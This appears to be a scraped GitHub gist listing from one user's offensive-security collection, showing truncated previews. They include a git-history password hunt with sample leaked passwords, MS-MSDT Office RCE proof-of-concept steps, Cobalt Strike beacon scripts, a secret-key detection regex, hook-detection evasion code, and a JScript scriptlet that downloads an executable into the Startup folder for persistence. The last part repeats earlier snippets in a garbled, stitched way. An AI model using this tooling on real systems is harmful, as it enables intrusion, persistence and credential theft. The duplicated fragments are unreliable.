fuckup fuckup1337

## JavascriptRecon.md

      
              1 file
            
          
              19 forks
            
          
                2 comments
              
            
              33 stars
            
          
                fuckup1337
                / JavascriptRecon.md
            
            
              Created
              January 18, 2021 20:02
            
              
                My Javascript Recon Process - BugBounty
              
          
    Description

This is a simple guide to perform javascript recon in the bugbounty
Steps


The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)


## Git Creds.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              1 star
            
          
                fuckup1337
                / Git Creds.md
            
            
              Created
              January 8, 2021 00:59
                — forked from int0x80/Git Creds.md
            
          
    Finding creds in git repos is awesome.
$ for commit in $(seq 1 $(git reflog | wc -l)); do git diff HEAD@{$commit} 2>/dev/null | grep password; done
-spring.datasource.password=g!'301T%y%xT@uL`
+spring.datasource.password=4AT&G;[H@&'\^uDK
-spring.datasource.password=UmAnR=-v|{2=gyx?
+spring.datasource.password=4AT&G;[H@&'\^uDK
...

  
## ms-msdt.MD

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                fuckup1337
                / ms-msdt.MD
            
            
              Created
              June 1, 2022 17:12
                — forked from tothi/ms-msdt.MD
            
              
                The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process
              
          
    MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).
The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).
Here are the steps to build a Proof-of-Concept docx:

Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.


## update-golang.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                fuckup1337
                / update-golang.md
            
            
              Created
              May 31, 2022 06:23
                — forked from nikhita/update-golang.md
            
              
                How to update the Go version
              
          
    How to update the Go version

System: Debian/Ubuntu/Fedora. Might work for others as well.
1. Uninstall the exisiting version

As mentioned here, to update a go version you will first need to uninstall the original version.
To uninstall, delete the /usr/local/go directory by:

  
## EventLogInject.cs
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;

namespace HiddenEventLogs
{

## Generic keys
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k

## gist:bc15bc12b31058e6cb3a5abb565fbb24

on heartbeat_15m {
	    foreach $beacon (beacons()) {
			println("[VPN] Running command on id: " . $beacon['id'] . ", hostname:" . binfo($beacon['id'], "computer") . "\n");
	        $id = $beacon['id'];
			bipconfig($id,{
				print("[VPN] Captured network interfaces from " . binfo($1, "computer") . ", looking for a new IPs to alert on\n");
                exec("python3.7 /<fullpath>/AlertOnNewIp.py --data " . transform($2, "powershell-base64") . " --user " . binfo($1, "user") . " --computer " . binfo($1, "computer"));
            });
	    }

## gist:a074619d2d90615661b3c9ce6f57e6d4
#!/usr/bin/env python
# Super dirty python3 scripts that alerts Cobalt Strike operator using pushover when a new IP is found amoung network interface on beacon
# Aggressor script for triggering this : https://gist.github.com/Flangvik/c31b26129743be699133dc9dab9c02c5
import argparse
from datetime import datetime
from base64 import b64encode,b64decode
from pushover import init, Client
from os import path

parser = argparse.ArgumentParser(description='beacon info')

## load.scr
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<script language="JScript">
		<![CDATA[
	    	var w = new ActiveXObject("WScript.Shell");
            localpath = w.SpecialFolders("Startup") + "\\file.exe";
            url = "https://raw.githubusercontent.com/fuckup1337/calc/main/calc.exe";

## findhooks.cs
using System;
using System.Runtime.InteropServices;

/* References
 * 1. https://www.ired.team/offensive-security/defense-evasion/detecting-hooked-syscall-functions
 * 2. https://github.com/Mr-Un1k0d3r/EDRs
 */

namespace SharpHookCheck
{
	using System;
	using System.Collections.Generic;
	using System.Diagnostics;
	using System.Linq;
	using System.Runtime.InteropServices;
	using System.Text;
	using System.Threading.Tasks;

	namespace HiddenEventLogs
	{

	on heartbeat_15m {
	foreach $beacon (beacons()) {
	println("[VPN] Running command on id: " . $beacon['id'] . ", hostname:" . binfo($beacon['id'], "computer") . "\n");
	$id = $beacon['id'];
	bipconfig($id,{
	print("[VPN] Captured network interfaces from " . binfo($1, "computer") . ", looking for a new IPs to alert on\n");
	exec("python3.7 /<fullpath>/AlertOnNewIp.py --data " . transform($2, "powershell-base64") . " --user " . binfo($1, "user") . " --computer " . binfo($1, "computer"));
	});
	}
	#!/usr/bin/env python
	# Super dirty python3 scripts that alerts Cobalt Strike operator using pushover when a new IP is found amoung network interface on beacon
	# Aggressor script for triggering this : https://gist.github.com/Flangvik/c31b26129743be699133dc9dab9c02c5
	import argparse
	from datetime import datetime
	from base64 import b64encode,b64decode
	from pushover import init, Client
	from os import path

	parser = argparse.ArgumentParser(description='beacon info')
	<?XML version="1.0"?>
	<scriptlet>
	<registration
	progid="PoC"
	classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<script language="JScript">
	<![CDATA[
	var w = new ActiveXObject("WScript.Shell");
	localpath = w.SpecialFolders("Startup") + "\\file.exe";
	url = "https://raw.githubusercontent.com/fuckup1337/calc/main/calc.exe";
	using System;
	using System.Runtime.InteropServices;

	/* References
	* 1. https://www.ired.team/offensive-security/defense-evasion/detecting-hooked-syscall-functions
	* 2. https://github.com/Mr-Un1k0d3r/EDRs
	*/

	namespace SharpHookCheck
	{